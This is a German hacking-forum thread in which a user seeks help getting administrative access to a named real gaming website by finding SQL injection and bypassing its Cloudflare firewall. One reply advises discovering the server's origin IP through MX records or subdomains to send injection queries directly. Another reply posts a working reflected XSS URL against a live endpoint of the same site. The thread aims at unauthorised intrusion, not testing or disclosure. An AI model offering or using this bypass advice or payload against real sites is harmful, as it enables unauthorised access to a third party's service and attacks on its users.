Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLi Suche] http://osusig.ppy.sh/?u=GrizzlyBlair

- - - - -

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
pr0legend

pr0legend

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    23
  • 40 Beiträge
  • 5 Bedankt

Hallo,

 

ich würde gerne auf der Seite

Please Login HERE or Register HERE to see this link!

administrativen Zugriff haben. Dazu würde ich gerne nach einer SQLi o.ä. suchen, jedoch weiß ich nicht wie man den Cloudflare WAF bypassen kann.

 

Beispiel: 

Please Login HERE or Register HERE to see this link!

 

Wäre um jede Hilfe dankbar!


Bearbeitet von pr0legend, 20 January 2016 - 09:23 Uhr.

“There is a theory which states that if ever anyone discovers exactly what the Universe is for and why it is here, it will instantly disappear and be replaced by something even more bizarre and inexplicable.
There is another theory which states that this has already happened.”
- Douglas Adams

#2
MDDD

MDDD

    Hacktivist

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    9
  • 70 Beiträge
  • 11 Bedankt

wenn glück hast kannst die real ip des servers über MX / Subdomains rausfinden und deine queries direkt über die ip übergeben sofern nur die webseite auf dem host ist und keine default html scheiße von plesk


adde mich

mddd_@exploit.im + OTR

suchst du was ?


#3
pr0legend

pr0legend

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    23
  • 40 Beiträge
  • 5 Bedankt

wenn glück hast kannst die real ip des servers über MX / Subdomains rausfinden und deine queries direkt über die ip übergeben sofern nur die webseite auf dem host ist und keine default html scheiße von plesk

 

Hatte ich keinen Erfolg mit, aber du kannst es gerne nochmals prüfen!


“There is a theory which states that if ever anyone discovers exactly what the Universe is for and why it is here, it will instantly disappear and be replaced by something even more bizarre and inexplicable.
There is another theory which states that this has already happened.”
- Douglas Adams

#4
x4r4x

x4r4x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    47
  • 46 Beiträge
  • 15 Bedankt

Ist zwar keine SQLI aber immerhin:

http://osu.ppy.sh/p/beatmaplist?g=0&la=0&m=0&o=-1&r=0&ra=1' onmouseover=alert(String.fromCharCode(88,83,83)); x='&s=3

xzmRY3a.png





  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 38 Mitglied(ern) gelesen


    , 0*ptr, Ar@m!s, B1nary, Bornload, Bot4ng, Ch!ller, ChEeTaH182, cX., CyberFlash, Dark, daten, Framerater, frechdax, hacked, ItsDezzen, Karma, keyb0ardz, Kozuki, Laggy, len0, lNobodyl, m0rph75, Mantrayana, MDDD, Mr_NiceGuy, n0de, old_panther, Osed28, pdr0, pi^2, pr0legend, R3s1stanc3, subsubsub, Take1T, Toolbase, umarex, x4r4x
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.